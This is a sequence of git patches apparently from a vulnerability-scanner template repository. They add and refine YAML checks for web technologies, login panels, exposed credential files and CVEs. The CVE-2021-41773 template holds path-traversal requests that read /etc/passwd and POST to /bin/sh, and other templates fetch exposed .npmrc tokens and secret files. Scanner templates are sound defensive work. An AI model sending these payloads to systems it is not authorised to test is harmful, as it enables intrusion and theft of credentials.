true words: - "Powered By vBulletin" + extractors: - type: regex name: version From 58ce415537ad16d2ddac1582a085a9551abd1bc3 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 30 Nov 2022 13:53:24 +0530 Subject: [PATCH 0778/1415] Update vbulletin-detect.yaml --- technologies/vbulletin-detect.yaml | 17 +++++++---------- 1 file changed, 7 insertions(+), 10 deletions(-) diff --git a/technologies/vbulletin-detect.yaml b/technologies/vbulletin-detect.yaml index 001573c8f8..a37378fc1b 100644 --- a/technologies/vbulletin-detect.yaml +++ b/technologies/vbulletin-detect.yaml @@ -9,8 +9,8 @@ info: - https://www.vbulletin.com/ metadata: verified: true - build-with-query: https://trends.builtwith.com/websitelist/vBulletin - google-query: intext:"Powered By vBulletin" + shodan-query: title:"Powered By vBulletin" + google-dork: intext:"Powered By vBulletin" tags: tech,vbulletin requests: @@ -20,18 +20,15 @@ requests: host-redirects: true max-redirects: 2 - matchers-condition: or matchers: - - type: regex - regex: - - "(?i)meta.name=.generator.*content=.vBulletin" - - '(?i)\*.vBulletin.([\d.|\d]+).CSS' - condition: or - - type: word - case-insensitive: true + part: body words: - "Powered By vBulletin" + - 'content="vBulletin' + - 'id="vbulletin_css' + condition: or + case-insensitive: true extractors: - type: regex From f2a8f93e5f878f30b48de1ab39f89a28bf5d6dc5 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 30 Nov 2022 14:20:37 +0530 Subject: [PATCH 0779/1415] Update CVE-2022-2034.yaml --- cves/2022/CVE-2022-2034.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/cves/2022/CVE-2022-2034.yaml b/cves/2022/CVE-2022-2034.yaml index ef25bfbf09..bf7f4fac6c 100644 --- a/cves/2022/CVE-2022-2034.yaml +++ b/cves/2022/CVE-2022-2034.yaml @@ -8,7 +8,9 @@ info: The Sensei LMS WordPress plugin before 4.5.0 does not have proper permissions set in one of its REST endpoint, allowing unauthenticated users to access private messages sent to teachers reference: - https://wpscan.com/vulnerability/aba3dd58-7a8e-4129-add5-4dd5972c0426 - - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2034 + - https://hackerone.com/reports/1590237 + - https://wordpress.org/plugins/sensei-lms/advanced/ + - https://nvd.nist.gov/vuln/detail/CVE-2022-2034 classification: cve-id: CVE-2022-2034 tags: cve,cve2022,wordpress,wp-plugin,wp From cb1c230e286e16fa44d95f332d765102f1b91822 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Wed, 30 Nov 2022 14:25:47 +0530 Subject: [PATCH 0780/1415] Update CVE-2022-2034.yaml --- cves/2022/CVE-2022-2034.yaml | 29 +++++++++++++++++------------ 1 file changed, 17 insertions(+), 12 deletions(-) diff --git a/cves/2022/CVE-2022-2034.yaml b/cves/2022/CVE-2022-2034.yaml index bf7f4fac6c..d1707985b2 100644 --- a/cves/2022/CVE-2022-2034.yaml +++ b/cves/2022/CVE-2022-2034.yaml @@ -13,26 +13,31 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2022-2034 classification: cve-id: CVE-2022-2034 - tags: cve,cve2022,wordpress,wp-plugin,wp + metadata: + verified: true + tags: cve,cve2022,wordpress,wp-plugin,wp,disclosure,sensei-lms requests: - method: GET path: - - "{{BaseURL}}/wp-json/wp/v2/sensei-messages/" + - "{{BaseURL}}/wp-json/wp/v2/sensei-messages/0" matchers-condition: and matchers: - - type: regex + - type: word + part: body + words: + - 'message":"Invalid post ID.' + - 'guid":{"rendered":' + condition: or + + - type: word part: header - regex: - - '(?i)Location: http(s|):\/\/[\w\.\-]+\/sensei-messages\/\w+' + words: + - application/json - type: status status: - - 301 - - extractors: - - type: regex - part: header - regex: - - 'sensei-messages\/\w+' + - 404 + - 200 + condition: or From 305b5c7e3a6e4a72638bcbc078427466bb3da24c Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Wed, 30 Nov 2022 15:59:32 +0530 Subject: [PATCH 0781/1415] Create sftp-deployment-config.yaml --- exposures/configs/sftp-deployment-config.yaml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 exposures/configs/sftp-deployment-config.yaml diff --git a/exposures/configs/sftp-deployment-config.yaml b/exposures/configs/sftp-deployment-config.yaml new file mode 100644 index 0000000000..7dd27c64c0 --- /dev/null +++ b/exposures/configs/sftp-deployment-config.yaml @@ -0,0 +1,32 @@ +id: sftp-deployment-config + +info: + name: Atom Package SFTP - Deployment Configuration Disclosure + author: geeknik + severity: high + description: | + Created by sftp-deployment for Atom, contains server details and credentials + reference: + - https://atom.io/packages/sftp-deployment + metadata: + verified: true + github-query: filename:deployment-config.json sftp + tags: sftp,atom,config,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/deployment-config.json" + + matchers-condition: and + matchers: + - type: word + words: + - "host" + - "username" + - "password" + condition: and + + - type: status + status: + - 200 From 5978dc73a44e87b2f785bd8b83f46966fd8652a1 Mon Sep 17 00:00:00 2001 From: y0no Date: Wed, 30 Nov 2022 14:59:46 +0100 Subject: [PATCH 0782/1415] Update CVE-2021-41773.yaml Improve CVE-2021-41773 detection --- cves/2021/CVE-2021-41773.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/cves/2021/CVE-2021-41773.yaml b/cves/2021/CVE-2021-41773.yaml index 2786956c21..3dc305a56e 100644 --- a/cves/2021/CVE-2021-41773.yaml +++ b/cves/2021/CVE-2021-41773.yaml @@ -32,6 +32,10 @@ requests: GET /icons/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 Host: {{Hostname}} + - | + GET /cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd HTTP/1.1 + Host: {{Hostname}} + - | POST /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1 Host: {{Hostname}} From 2b55ac5273edaf30b1766e93bef6b3c4619fb624 Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Wed, 30 Nov 2022 17:17:06 -0500 Subject: [PATCH 0783/1415] Update wordpress-takeover.yaml - Pointing to specific info about the takeover. - hackerone Report. --- takeovers/wordpress-takeover.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/takeovers/wordpress-takeover.yaml b/takeovers/wordpress-takeover.yaml index b8b1ef5431..a5596174ba 100644 --- a/takeovers/wordpress-takeover.yaml +++ b/takeovers/wordpress-takeover.yaml @@ -5,7 +5,8 @@ info: author: pdteam,geeknik severity: high reference: - - https://github.com/EdOverflow/can-i-take-over-xyz + - https://github.com/EdOverflow/can-i-take-over-xyz/pull/176 + - https://hackerone.com/reports/274336 tags: takeover,wordpress requests: From 2bcfd292c28f31d65e38a84cef8bd9e267b849ea Mon Sep 17 00:00:00 2001 From: Ricardo Maia Date: Wed, 30 Nov 2022 23:11:35 -0300 Subject: [PATCH 0784/1415] Add open-cart-detect.yaml --- technologies/open-cart-detect.yaml | 30 ++++++++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 technologies/open-cart-detect.yaml diff --git a/technologies/open-cart-detect.yaml b/technologies/open-cart-detect.yaml new file mode 100644 index 0000000000..2369fe34d5 --- /dev/null +++ b/technologies/open-cart-detect.yaml @@ -0,0 +1,30 @@ +id: opencart-detect + +info: + name: OpenCart Detect + author: ricardomaia + severity: info + description: OpenCart is an open-source online store management system. + + metadata: + verified: true + build-with-query: https://trends.builtwith.com/websitelist/OpenCart + + reference: + - https://www.opencart.com/ + tags: tech,ecommerce,opencart + +requests: + - method: GET + path: + - "{{BaseURL}}/admin" + - "{{BaseURL}}/index.php?route=account/login" + redirects: true + max-redirects: 2 + stop-at-first-match: true + matchers: + - type: regex + regex: + - '(?i)footer\s.*OpenCart.*All.Rights.Reserved|img\s.*logo.*\salt=.*OpenCart' + - "(?i)Powered.By.*http.*OpenCart" + condition: or From bc2c5e6e732e605f2feef47591c54a37048ff704 Mon Sep 17 00:00:00 2001 From: Ricardo Maia Date: Wed, 30 Nov 2022 23:18:09 -0300 Subject: [PATCH 0785/1415] Rename open-cart-detect.yaml to opencart-detect.yaml --- technologies/{open-cart-detect.yaml => opencart-detect.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename technologies/{open-cart-detect.yaml => opencart-detect.yaml} (100%) diff --git a/technologies/open-cart-detect.yaml b/technologies/opencart-detect.yaml similarity index 100% rename from technologies/open-cart-detect.yaml rename to technologies/opencart-detect.yaml From d6da7764716d09ded0ca463e0283153ba16e1cb3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 1 Dec 2022 09:00:51 +0530 Subject: [PATCH 0787/1415] Update opencart-detect.yaml --- technologies/opencart-detect.yaml | 13 +++++++------ 1 file changed, 7 insertions(+), 6 deletions(-) diff --git a/technologies/opencart-detect.yaml b/technologies/opencart-detect.yaml index 2369fe34d5..8608086ae1 100644 --- a/technologies/opencart-detect.yaml +++ b/technologies/opencart-detect.yaml @@ -4,14 +4,13 @@ info: name: OpenCart Detect author: ricardomaia severity: info - description: OpenCart is an open-source online store management system. - + description: | + OpenCart is an open-source online store management system. + reference: + - https://www.opencart.com metadata: verified: true - build-with-query: https://trends.builtwith.com/websitelist/OpenCart - - reference: - - https://www.opencart.com/ + shodan-query: html:"OpenCart" tags: tech,ecommerce,opencart requests: @@ -19,8 +18,10 @@ requests: path: - "{{BaseURL}}/admin" - "{{BaseURL}}/index.php?route=account/login" + redirects: true max-redirects: 2 + stop-at-first-match: true matchers: - type: regex From 7dd45c45443dd895d7c890bd109737be51fca51d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Dec 2022 03:39:47 +0000 Subject: [PATCH 0788/1415] Auto Generated CVE annotations [Thu Dec 1 03:39:47 UTC 2022] :robot: --- takeovers/wordpress-takeover.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/takeovers/wordpress-takeover.yaml b/takeovers/wordpress-takeover.yaml index a5596174ba..828ac95f5d 100644 --- a/takeovers/wordpress-takeover.yaml +++ b/takeovers/wordpress-takeover.yaml @@ -7,7 +7,7 @@ info: reference: - https://github.com/EdOverflow/can-i-take-over-xyz/pull/176 - https://hackerone.com/reports/274336 - tags: takeover,wordpress + tags: takeover,wordpress,hackerone requests: - method: GET From bb81247e979b9d7d58376ceb0b5643c5113215a3 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 1 Dec 2022 09:09:47 +0530 Subject: [PATCH 0789/1415] Update and rename technologies/opencart-detect.yaml to exposed-panels/opencart-login.yaml --- .../opencart-login.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) rename technologies/opencart-detect.yaml => exposed-panels/opencart-login.yaml (89%) diff --git a/technologies/opencart-detect.yaml b/exposed-panels/opencart-login.yaml similarity index 89% rename from technologies/opencart-detect.yaml rename to exposed-panels/opencart-login.yaml index 8608086ae1..89dbc2b03c 100644 --- a/technologies/opencart-detect.yaml +++ b/exposed-panels/opencart-login.yaml @@ -1,7 +1,7 @@ -id: opencart-detect +id: opencart-login info: - name: OpenCart Detect + name: OpenCart Login author: ricardomaia severity: info description: | @@ -11,7 +11,7 @@ info: metadata: verified: true shodan-query: html:"OpenCart" - tags: tech,ecommerce,opencart + tags: panel,opencart requests: - method: GET From 222514486898375ea52244937bea2cb1c8ab8bbb Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 1 Dec 2022 10:51:58 +0530 Subject: [PATCH 0790/1415] Create openstack-user-secrets.yaml --- exposures/files/openstack-user-secrets.yaml | 32 +++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 exposures/files/openstack-user-secrets.yaml diff --git a/exposures/files/openstack-user-secrets.yaml b/exposures/files/openstack-user-secrets.yaml new file mode 100644 index 0000000000..f5f20c7962 --- /dev/null +++ b/exposures/files/openstack-user-secrets.yaml @@ -0,0 +1,32 @@ +id: openstack-user-secrets + +info: + name: OpenStack User Secrets Exposure + author: geeknik + severity: high + reference: + - https://docs.openstack.org/project-deploy-guide/openstack-ansible/stein/configure.html + metadata: + verified: true + github-query: filename:user_secrets.yml + tags: openstack,config,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/user_secrets.yml" + - "{{BaseURL}}/user_secrets.yml.old" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - "WARNING" + - "OpenStack environment" + condition: and + + - type: status + status: + - 200 From 34507f10c0c9cc6de5368c2ded372e75cb2a35fd Mon Sep 17 00:00:00 2001 From: Philippe Delteil Date: Thu, 1 Dec 2022 00:22:59 -0500 Subject: [PATCH 0791/1415] Create etherpad-open.yaml --- vulnerabilities/other/etherpad-open.yaml | 26 ++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 vulnerabilities/other/etherpad-open.yaml diff --git a/vulnerabilities/other/etherpad-open.yaml b/vulnerabilities/other/etherpad-open.yaml new file mode 100644 index 0000000000..4a460ccbda --- /dev/null +++ b/vulnerabilities/other/etherpad-open.yaml @@ -0,0 +1,26 @@ +id: etherpad-open + +info: + name: Etherpad open instance + author: philippedelteil + description: Finds Etherpad instances that allow adding new notes without authentication + severity: low + metadata: + - shodan-query: http.html:"index.createOpenPad" + tags: etherpad + +requests: + - method: GET + path: + - "{{BaseURL}}" + matchers-condition: and + matchers: + - type: word + words: + - "index.createOpenPad" + - "index.newPad" + condition: and + part: body + - type: status + status: + - 200 From 64784609d5268b992d6b9a62da5c1ccf8dca062b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 1 Dec 2022 11:23:09 +0530 Subject: [PATCH 0792/1415] Create npmrc-authtoken.yaml --- exposures/files/npmrc-authtoken.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 exposures/files/npmrc-authtoken.yaml diff --git a/exposures/files/npmrc-authtoken.yaml b/exposures/files/npmrc-authtoken.yaml new file mode 100644 index 0000000000..2730770673 --- /dev/null +++ b/exposures/files/npmrc-authtoken.yaml @@ -0,0 +1,27 @@ +id: npmrc-authtoken + +info: + name: Hardcoded .npmrc authToken + author: geeknik + severity: high + reference: + - https://docs.npmjs.com/cli/v8/configuring-npm/npmrc + - https://docs.github.com/en/packages/working-with-a-github-packages-registry/working-with-the-npm-registry + metadata: + verified: true + tags: npm,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/.npmrc" + + matchers-condition: and + matchers: + - type: word + words: + - "_authToken=" + + - type: status + status: + - 200 From 1e3ee33306dd8f40afcadf5bdb22578ec8bd4c24 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 1 Dec 2022 11:30:13 +0530 Subject: [PATCH 0793/1415] Update and rename etherpad-open.yaml to unauth-etherpad.yaml --- ...etherpad-open.yaml => unauth-etherpad.yaml} | 18 +++++++++++------- 1 file changed, 11 insertions(+), 7 deletions(-) rename vulnerabilities/other/{etherpad-open.yaml => unauth-etherpad.yaml} (54%) diff --git a/vulnerabilities/other/etherpad-open.yaml b/vulnerabilities/other/unauth-etherpad.yaml similarity index 54% rename from vulnerabilities/other/etherpad-open.yaml rename to vulnerabilities/other/unauth-etherpad.yaml index 4a460ccbda..a9974b4609 100644 --- a/vulnerabilities/other/etherpad-open.yaml +++ b/vulnerabilities/other/unauth-etherpad.yaml @@ -1,26 +1,30 @@ -id: etherpad-open +id: unauth-etherpad info: - name: Etherpad open instance + name: Unauthenticated Etherpad author: philippedelteil - description: Finds Etherpad instances that allow adding new notes without authentication severity: low + description: | + Finds Etherpad instances that allow adding new notes without authentication. metadata: - - shodan-query: http.html:"index.createOpenPad" - tags: etherpad + verified: true + shodan-query: http.html:"index.createOpenPad" + tags: etherpad,misconfig,unauth requests: - method: GET path: - - "{{BaseURL}}" + - '{{BaseURL}}' + matchers-condition: and matchers: - type: word + part: body words: - "index.createOpenPad" - "index.newPad" condition: and - part: body + - type: status status: - 200 From e98a068684c935c8d480e78b1336e0e4a88fcbd4 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 1 Dec 2022 11:30:55 +0530 Subject: [PATCH 0794/1415] Rename vulnerabilities/other/unauth-etherpad.yaml to misconfiguration/unauth-etherpad.yaml --- {vulnerabilities/other => misconfiguration}/unauth-etherpad.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename {vulnerabilities/other => misconfiguration}/unauth-etherpad.yaml (100%) diff --git a/vulnerabilities/other/unauth-etherpad.yaml b/misconfiguration/unauth-etherpad.yaml similarity index 100% rename from vulnerabilities/other/unauth-etherpad.yaml rename to misconfiguration/unauth-etherpad.yaml From 040d3c7515f5791e5d77436cd4f95ae03e998ff4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Dec 2022 06:53:05 +0000 Subject: [PATCH 0795/1415] Auto Generated New Template Addition List [Thu Dec 1 06:53:04 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 9c19d93720..149dbdf72a 100644 --- a/.new-additions +++ b/.new-additions @@ -11,6 +11,7 @@ exposed-panels/locklizard-webviewer-panel.yaml exposed-panels/mach-proweb-login.yaml exposed-panels/nuxeo-platform-panel.yaml exposed-panels/pega-web-panel.yaml +exposed-panels/persis-panel.yaml exposures/logs/ffserver-status.yaml misconfiguration/collectd-exporter-metrics.yaml misconfiguration/installer/oxid-eshop-installer.yaml From 4a893e5ab5a1acd5449380390320fc6d0db3fddd Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Dec 2022 06:55:23 +0000 Subject: [PATCH 0796/1415] Auto Generated New Template Addition List [Thu Dec 1 06:55:23 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 149dbdf72a..ce9fec0338 100644 --- a/.new-additions +++ b/.new-additions @@ -5,6 +5,7 @@ cves/2022/CVE-2022-1883.yaml cves/2022/CVE-2022-1916.yaml cves/2022/CVE-2022-1933.yaml cves/2022/CVE-2022-25481.yaml +exposed-panels/cudatel-panel.yaml exposed-panels/exolis-engage-panel.yaml exposed-panels/fastpanel-hosting-control-panel.yaml exposed-panels/locklizard-webviewer-panel.yaml From 81db1ea8695336690416e79f16f35061a5c7b188 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 1 Dec 2022 12:27:57 +0530 Subject: [PATCH 0797/1415] Update and rename asus-router-login.yaml to asus-router-panel.yaml --- .../{asus-router-login.yaml => asus-router-panel.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename exposed-panels/{asus-router-login.yaml => asus-router-panel.yaml} (95%) diff --git a/exposed-panels/asus-router-login.yaml b/exposed-panels/asus-router-panel.yaml similarity index 95% rename from exposed-panels/asus-router-login.yaml rename to exposed-panels/asus-router-panel.yaml index 62d122bfb2..f4484d15dd 100644 --- a/exposed-panels/asus-router-login.yaml +++ b/exposed-panels/asus-router-panel.yaml @@ -1,4 +1,4 @@ -id: asus-router-login +id: asus-router-panel info: name: Asus Router Login Panel From 8fb995fc72610aa6cff46c8b18611270e48a2423 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Dec 2022 07:00:18 +0000 Subject: [PATCH 0798/1415] Auto Generated New Template Addition List [Thu Dec 1 07:00:18 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index ce9fec0338..5dc6ad1889 100644 --- a/.new-additions +++ b/.new-additions @@ -5,6 +5,7 @@ cves/2022/CVE-2022-1883.yaml cves/2022/CVE-2022-1916.yaml cves/2022/CVE-2022-1933.yaml cves/2022/CVE-2022-25481.yaml +exposed-panels/asus-router-panel.yaml exposed-panels/cudatel-panel.yaml exposed-panels/exolis-engage-panel.yaml exposed-panels/fastpanel-hosting-control-panel.yaml From b8afaed1d30388fe1b486ac746de86dd3dce78a7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Dec 2022 07:02:46 +0000 Subject: [PATCH 0799/1415] Auto Generated New Template Addition List [Thu Dec 1 07:02:46 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 5dc6ad1889..e5120c91eb 100644 --- a/.new-additions +++ b/.new-additions @@ -14,6 +14,7 @@ exposed-panels/mach-proweb-login.yaml exposed-panels/nuxeo-platform-panel.yaml exposed-panels/pega-web-panel.yaml exposed-panels/persis-panel.yaml +exposed-panels/zyxel-router-login.yaml exposures/logs/ffserver-status.yaml misconfiguration/collectd-exporter-metrics.yaml misconfiguration/installer/oxid-eshop-installer.yaml From a3c40f4836323568ea9ddbf44177b00810974abb Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Dec 2022 07:06:34 +0000 Subject: [PATCH 0800/1415] Auto Generated New Template Addition List [Thu Dec 1 07:06:34 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index e5120c91eb..a84be5e9f8 100644 --- a/.new-additions +++ b/.new-additions @@ -29,6 +29,7 @@ misconfiguration/symfony-fosjrouting-bundle.yaml technologies/aerocms-detect.yaml technologies/oracle-httpserver12c.yaml technologies/payara-micro-server-detect.yaml +technologies/vbulletin-detect.yaml token-spray/api-giphy.yaml vulnerabilities/other/inspur-clusterengine-rce.yaml vulnerabilities/wordpress/wptouch-xss.yaml From 89187c51e37da2b9dbc02bd48d335e3cb8ab324c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 1 Dec 2022 12:37:53 +0530 Subject: [PATCH 0801/1415] Update CVE-2022-2034.yaml --- cves/2022/CVE-2022-2034.yaml | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) diff --git a/cves/2022/CVE-2022-2034.yaml b/cves/2022/CVE-2022-2034.yaml index d1707985b2..4ae6e73690 100644 --- a/cves/2022/CVE-2022-2034.yaml +++ b/cves/2022/CVE-2022-2034.yaml @@ -15,21 +15,25 @@ info: cve-id: CVE-2022-2034 metadata: verified: true - tags: cve,cve2022,wordpress,wp-plugin,wp,disclosure,sensei-lms + tags: cve,cve2022,wordpress,wp-plugin,wp,disclosure,sensei-lms,fuzz requests: - method: GET path: - - "{{BaseURL}}/wp-json/wp/v2/sensei-messages/0" + - "{{BaseURL}}/wp-json/wp/v2/sensei-messages/{{num}}" + payloads: + num: helpers/wordlists/numbers.txt + + stop-at-first-match: true matchers-condition: and matchers: - type: word part: body words: - - 'message":"Invalid post ID.' + - 'sensei_message' - 'guid":{"rendered":' - condition: or + condition: and - type: word part: header @@ -38,6 +42,4 @@ requests: - type: status status: - - 404 - 200 - condition: or From 88a0d4f7905e4a3a245f7fba565347168b462723 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Dec 2022 07:09:38 +0000 Subject: [PATCH 0802/1415] Auto Generated New Template Addition List [Thu Dec 1 07:09:38 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index a84be5e9f8..edc75108cd 100644 --- a/.new-additions +++ b/.new-additions @@ -26,6 +26,7 @@ misconfiguration/postgres-exporter-metrics.yaml misconfiguration/rabbitmq-exporter-metrics.yaml misconfiguration/s3-torrent.yaml misconfiguration/symfony-fosjrouting-bundle.yaml +misconfiguration/unauth-etherpad.yaml technologies/aerocms-detect.yaml technologies/oracle-httpserver12c.yaml technologies/payara-micro-server-detect.yaml From 59ae7405370b13dd1dc013aea8c6c42325055a76 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 1 Dec 2022 12:45:10 +0530 Subject: [PATCH 0804/1415] Update and rename vodafone-vox-ui.yaml to vodafone-voxui-panel.yaml --- .../{vodafone-vox-ui.yaml => vodafone-voxui-panel.yaml} | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename exposed-panels/{vodafone-vox-ui.yaml => vodafone-voxui-panel.yaml} (88%) diff --git a/exposed-panels/vodafone-vox-ui.yaml b/exposed-panels/vodafone-voxui-panel.yaml similarity index 88% rename from exposed-panels/vodafone-vox-ui.yaml rename to exposed-panels/vodafone-voxui-panel.yaml index 5359a2de55..733ae346ff 100644 --- a/exposed-panels/vodafone-vox-ui.yaml +++ b/exposed-panels/vodafone-voxui-panel.yaml @@ -1,7 +1,7 @@ -id: vodafone-vox-ui +id: vodafone-voxui-panel info: - name: Vodafone Vox UI + name: Vodafone Vox UI Panel author: Hardik-Solanki severity: info metadata: From 3d7727605c72a6fb0f3e19df9e5db0a176b5b7e4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Dec 2022 07:22:55 +0000 Subject: [PATCH 0805/1415] Auto Generated New Template Addition List [Thu Dec 1 07:22:55 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index edc75108cd..b3cbd18680 100644 --- a/.new-additions +++ b/.new-additions @@ -5,6 +5,7 @@ cves/2022/CVE-2022-1883.yaml cves/2022/CVE-2022-1916.yaml cves/2022/CVE-2022-1933.yaml cves/2022/CVE-2022-25481.yaml +cves/2022/CVE-2022-3506.yaml exposed-panels/asus-router-panel.yaml exposed-panels/cudatel-panel.yaml exposed-panels/exolis-engage-panel.yaml From d8c45f26ff74ab57ec39b1d02f13cdefd86b01fa Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 1 Dec 2022 12:53:31 +0530 Subject: [PATCH 0806/1415] Update dradis-pro-panel.yaml --- exposed-panels/dradis-pro-panel.yaml | 2 -- 1 file changed, 2 deletions(-) diff --git a/exposed-panels/dradis-pro-panel.yaml b/exposed-panels/dradis-pro-panel.yaml index 185789f7b2..95f1daf795 100644 --- a/exposed-panels/dradis-pro-panel.yaml +++ b/exposed-panels/dradis-pro-panel.yaml @@ -22,8 +22,6 @@ requests: part: body words: - "Dradis Professional Edition" - - "Dradis requires JavaScript" - condition: and - type: status status: From aa39aaa85622503f74be0d22a7df044b7ba40e79 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Dec 2022 07:24:01 +0000 Subject: [PATCH 0807/1415] Auto Generated New Template Addition List [Thu Dec 1 07:24:01 UTC 2022] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index b3cbd18680..89ac10f01d 100644 --- a/.new-additions +++ b/.new-additions @@ -15,6 +15,7 @@ exposed-panels/mach-proweb-login.yaml exposed-panels/nuxeo-platform-panel.yaml exposed-panels/pega-web-panel.yaml exposed-panels/persis-panel.yaml +exposed-panels/vodafone-voxui-panel.yaml exposed-panels/zyxel-router-login.yaml exposures/logs/ffserver-status.yaml misconfiguration/collectd-exporter-metrics.yaml From 4dac0888cf81f801df4a6aa00ad71529393f82bf Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 1 Dec 2022 13:03:35 +0530 Subject: [PATCH 0809/1415] Update workerman-websocket-detect.yaml --- technologies/workerman-websocket-detect.yaml | 22 +++++--------------- 1 file changed, 5 insertions(+), 17 deletions(-) diff --git a/technologies/workerman-websocket-detect.yaml b/technologies/workerman-websocket-detect.yaml index f858b8b9c1..19c460f738 100644 --- a/technologies/workerman-websocket-detect.yaml +++ b/technologies/workerman-websocket-detect.yaml @@ -9,7 +9,7 @@ info: - https://github.com/walkor/Workerman metadata: verified: true - shodan-query: html:"workerman" + shodan-query: "workerman" tags: tech,workerman,websocket requests: @@ -22,22 +22,10 @@ requests: - type: word part: header words: - - 'workerman' - - - type: word - part: body - words: - - 'Websocket' - - 'workerman' - condition: and - - - type: status - status: - - 200 + - 'workerman/' extractors: - - type: regex + - type: kval part: header - name: version - regex: - - 'workerman\/\d\.\d\.\d' + kval: + - Server From da8f1ef179c93675f55c10fd4a96265b6e21c14d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Dec 2022 07:37:05 +0000 Subject: [PATCH 0810/1415] Auto Generated CVE annotations [Thu Dec 1 07:37:05 UTC 2022] :robot: --- cves/2022/CVE-2022-3506.yaml | 11 +++++++++-- 1 file changed, 9 insertions(+), 2 deletions(-) diff --git a/cves/2022/CVE-2022-3506.yaml b/cves/2022/CVE-2022-3506.yaml index e776267947..558d3ad7f9 100644 --- a/cves/2022/CVE-2022-3506.yaml +++ b/cves/2022/CVE-2022-3506.yaml @@ -8,9 +8,16 @@ info: The Related Posts for WordPress plugin is vulnerable to stored XSS, specifically in the rp4wp[heading_text] parameter because the user input is not properly sanitized, allowing the insertion of JavaScript code that can exploit the vulnerability. reference: - https://huntr.dev/bounties/08251542-88f6-4264-9074-a89984034828/ + - https://huntr.dev/bounties/08251542-88f6-4264-9074-a89984034828 + - https://github.com/barrykooij/related-posts-for-wp/commit/37733398dd88863fc0bdb3d6d378598429fd0b81 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2022-3506 + cwe-id: CWE-79 metadata: - verified: true - tags: cve,cve2022,wordpress,wp,wp-plugin,xss,relatedposts,authenticated + verified: "true" + tags: wordpress,wp,wp-plugin,relatedposts,cve,cve2022,xss,authenticated,huntr requests: - raw: From 19e72064bd18d31bc9d1c467b1d3784c3ee710ec Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Dec 2022 